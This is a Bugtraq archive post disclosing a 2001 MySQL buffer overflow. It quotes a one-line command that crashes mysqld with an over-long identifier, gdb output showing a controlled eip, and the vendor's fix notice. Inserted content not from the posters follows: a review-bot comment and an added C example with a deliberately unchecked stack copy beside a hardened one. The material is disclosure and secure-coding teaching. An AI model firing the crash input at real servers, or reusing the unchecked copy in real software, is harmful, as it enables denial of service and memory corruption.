Bugtraq mailing list archives
Buffer overflow in MySQL < 3.23.31
From: Nicolas GREGOIRE <nicolas.gregoire () 7THZONE COM>
Date: Thu, 18 Jan 2001 18:44:31 +0100
Hi,

All versions of MySQL < 3.23.31 have a buffer overflow which crashes the server and which seems to be exploitable (i.e. 41414141 in eip).

Problem : An attacker could gain mysqld privileges (gaining access to all the databases)
Requirements : You need a valid login/password to exploit this
Solution : Upgrade to 3.23.31
Proof-of-concept code : None
Credits : I'm not the discoverer of this bug. The first public report was made by tharbad () kaotik org via the MySQL mailing-list. See the following mails for details.

Regards,
Nicob

Here is the original post to the MySQL mailing-list :
==================================================
On Jan 12, João Gouveia wrote:
Hi,

I believe I've found a problem in MySQL. Here are some tests I've made on 3.22.27 x86 (also tested on v3.22.32 - latest stable, although I didn't debug it, just tested to see if it crashes). Confirmed up to latest 3.23.
On one terminal:
<quote>
spike:/var/mysql # /sbin/init.d/mysql start
Starting service MySQL.
Starting mysqld daemon with databases from /var/mysql
done
spike:/var/mysql #
</quote>

On the other terminal:
<quote>
jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
Enter password:
(hanged..^C)
</quote>

On the first terminal I got:
<quote>
spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault nohup $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
Number of processes running now: 0
mysqld restarted on Fri Jan 12 07:10:54 WET 2001
mysqld daemon ended
</quote>

gdb shows the following:
<quote>
(gdb) run
Starting program: /usr/sbin/mysqld
[New Thread 16897 (manager thread)]
[New Thread 16891 (initial thread)]
[New Thread 16898]
/usr/sbin/mysqld: ready for connections
[New Thread 16916]
[Switching to Thread 16916]

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info all-registers
eax            0x1              1
ecx            0x68             104
edx            0x8166947        135686471
ebx            0x41414141       1094795585
esp            0xbf5ff408       0xbf5ff408
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x0              0
eip            0x41414141       0x41414141
eflags         0x10246          66118
cs             0x23             35
ss             0x2b             43
ds             0x2b             43
es             0x2b             43
fs             0x0              0
gs             0x0              0
(gdb)
</quote>

Looks like a typical overflow to me.
Please reply asap, at least to tell me I'm not seeing things. :-)

Best regards,
Joao Gouveia aka Tharbad.
tharbad () kaotik org
Here is the response to an email I sent today to the MySQL list :
============================================================
Sergei Golubchik (MySQL team) wrote :
Hi!

On Jan 18, Nicolas GREGOIRE wrote:
<quote>
Hi,

Still not any info about the buffer-overflow discovered last week ?
Shouldn't it be fixed at the beginning of the week ?
Please, dear MySQL team, give us info !!

Regards,
Nicob
</quote>

Fixed in latest release (3.23.31).

Regards,
Sergei
Here is a part of the 3.23.30 to 3.23.31 diff :
=============================================
+Changes in release 3.23.31 +-------------------------- + + * Fixed security bug in something (please upgrade if you are using a + earlier MySQL 3.23 version).
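Review bot: the changelog entry added under "+Changes in release 3.23.31" says only "Fixed security bug in something", which tells an administrator neither which component was fixed nor how to judge exposure; state the affected code path and effect (an over-long identifier in a query crashing mysqld, as the report in this thread describes) so the entry can be matched to the report, and change "a earlier" to "an earlier" in the wrapped line.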
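The report above gives the symptom (a 130-byte component in a qualified name, 0x41414141 in ebp and eip) but no code, and the MySQL fix is not on the page. The following is an added example, not MySQL source and not from any of the posters, showing the bug class a reviewer would look for: a dotted name such as db.table.column is split and each component is NUL-terminated in a fixed stack buffer before use. The unsafe copy has no length check, so a component longer than the buffer overwrites the saved frame pointer and return address above it; the checked copy refuses such a component before writing a byte. NAME_LEN = 64 follows MySQL's documented identifier limit; the struct layout, MAX_PARTS and all function names are assumptions made for the illustration.

```c
/*
 * Added example (not MySQL source): fixed-size identifier buffer with and
 * without a length check. Assumptions: NAME_LEN (MySQL documents a 64-char
 * identifier limit), MAX_PARTS, the struct layout and the function names.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_LEN  64   /* assumed identifier limit */
#define MAX_PARTS 3    /* db.table.column */

struct qualified_name {
    int  nparts;
    char part[MAX_PARTS][NAME_LEN + 1];
};

/* Vulnerable pattern: NUL-terminate a component in a local buffer without
 * checking len against the buffer. With len == 130, the copy runs past
 * 'name' into the saved frame pointer and return address, which is what
 * the 0x41414141 in ebp and eip in the gdb output looks like. It is here to
 * show the missing check; it is only ever called with a short input. */
int component_equals_unsafe(const char *p, size_t len, const char *wanted)
{
    char name[NAME_LEN + 1];
    memcpy(name, p, len);          /* no bounds check on len */
    name[len] = '\0';
    return strcmp(name, wanted) == 0;
}

/* Hardened: the same copy, preceded by the length check. Returns 0 on
 * success, -1 when the component is empty or longer than NAME_LEN. */
int copy_component_checked(const char *p, size_t len, char *out)
{
    if (len == 0 || len > NAME_LEN)
        return -1;                 /* reject before touching the buffer */
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Splits expr on '.' into at most MAX_PARTS checked components.
 * Returns 0 on success, -1 if a component is invalid or there are too many. */
int split_qualified_checked(const char *expr, struct qualified_name *q)
{
    const char *p = expr;
    q->nparts = 0;
    for (;;) {
        const char *dot = strchr(p, '.');
        size_t len = dot ? (size_t)(dot - p) : strlen(p);
        if (q->nparts == MAX_PARTS)
            return -1;
        if (copy_component_checked(p, len, q->part[q->nparts]) != 0)
            return -1;
        q->nparts++;
        if (!dot)
            return 0;
        p = dot + 1;
    }
}

/* Reconstructs the report's expression: "a." + n bytes of 'A' + ".b".
 * The caller frees the result. */
char *build_poc_expr(size_t n)
{
    char *s = malloc(n + 5);
    if (!s) return NULL;
    s[0] = 'a'; s[1] = '.';
    memset(s + 2, 'A', n);
    s[n + 2] = '.'; s[n + 3] = 'b'; s[n + 4] = '\0';
    return s;
}

/* Runs the checked splitter on the report's expression with an n-byte
 * middle component. Returns 0 (accepted) or -1 (rejected). */
int poc_result(size_t n)
{
    struct qualified_name q;
    char *poc = build_poc_expr(n);
    int rc = poc ? split_qualified_checked(poc, &q) : -1;
    free(poc);
    return rc;
}

/* Number of parts the checked splitter yields for expr, or -1 if rejected. */
int parts_of(const char *expr)
{
    struct qualified_name q;
    return split_qualified_checked(expr, &q) == 0 ? q.nparts : -1;
}

int main(void)
{
    printf("a.b        -> %d parts\n", parts_of("a.b"));
    printf("db.t.c     -> %d parts\n", parts_of("db.t.c"));
    printf("64 x 'A'   -> %s\n", poc_result(64)  == 0 ? "accepted" : "rejected");
    printf("130 x 'A'  -> %s\n", poc_result(130) == 0 ? "accepted" : "rejected");
    /* component_equals_unsafe() with the 130-byte component would be the
     * crash from the report, so it is deliberately not executed here. */
    return 0;
}
```

The point of the pair is where the check sits: the length of every component is validated against the buffer before any copy, and an over-long or empty component makes the whole name fail closed rather than being truncated or copied partially. Truncating instead of rejecting would stop the crash but could make a.AAAA... resolve to a different table than the client named.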
Current thread:
- Buffer overflow in MySQL < 3.23.31 Nicolas GREGOIRE (Jan 19)
- Re: Buffer overflow in MySQL < 3.23.31 Joao Gouveia (Jan 23)